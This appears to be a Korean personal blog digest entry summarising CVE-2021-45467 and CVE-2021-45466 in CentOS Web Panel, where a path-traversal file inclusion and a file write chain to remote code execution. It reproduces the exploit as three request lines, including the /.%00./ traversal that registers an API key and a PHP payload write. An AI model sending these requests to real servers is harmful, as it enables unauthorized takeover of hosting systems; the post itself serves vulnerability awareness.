Created: January 25, 2022 1:27 PM
1. 리눅스 CWP 제어판 요소에서 발견된 취약점
Reference: https://octagon.net/blog/2022/01/22/cve-2021-45467-cwp-centos-web-panel-preauth-rce/ / https://www.boannews.com/media/view.asp?idx=104340&page=1&mkind=1&kind=
CWP는 centOS web panel이라고 불리는 오픈소스 리눅스 제어판으로 웹 호스팅 서버와 가상 사설 서버를 관리하는데 사용된다(centOS, Rocky linux, Alma linux, Oracle linux 지원). 발견된 두가지 취약점은 file inclusion, file write 취약점으로 두개의 취약점이 연결되면 RCE로 이어질 수 있다.
CVE-2021-45467(file inclusion), CVE-2021-45466(file write) 취약점이다.
CWP의 함수 중 몇개(require(), include() )가 /.%00./ 을 /../ 으로 처리를 한다. 파일 포함 취약점과 아래의 파일 쓰기 취약점을 이용하여 RCE가 가능핟.
CWP는 CWP-Secure-Kernel이라는 유닉스 rw 잠금 설정이 있지만 해당 file inclusion 취약점을 이용하여 제한된 API 섹션에 접근할 수 있어서 취약점을 이용할 수 있게 된다.
1. GET https://CWP/user/loader.php?api=1&scripts= .%00./.%00./api/account_new_create&acc=guadaapi&ip=192.168.1.1&keyapi=OCTAGON
2. GET https://CWP/api/?key=OCTAGON&api=add_server
3. https[://]CWP/api/?key=OCTAGON&api=add_server&DHCP=<?=phpinfo()?>&fileFinal=/1,2를 통해 전체 API에 접근할 수 있도록 API 키를 등록하고나면, 3번 페이로드를 통해 authorized_keys 라는 파일을 /resources/ 폴더에 쓸 수 있게 된다.
'깔짝할짝' 카테고리의 다른 글
| 2022-01-27 Thur (0) | 2022.01.27 |
|---|---|
| 2022-01-26 Wed (0) | 2022.01.26 |
| 2022-01-24 Mon (0) | 2022.01.24 |
| 2022-01-18 Tue (0) | 2022.01.18 |
| 2022-01-17 Mon (0) | 2022.01.17 |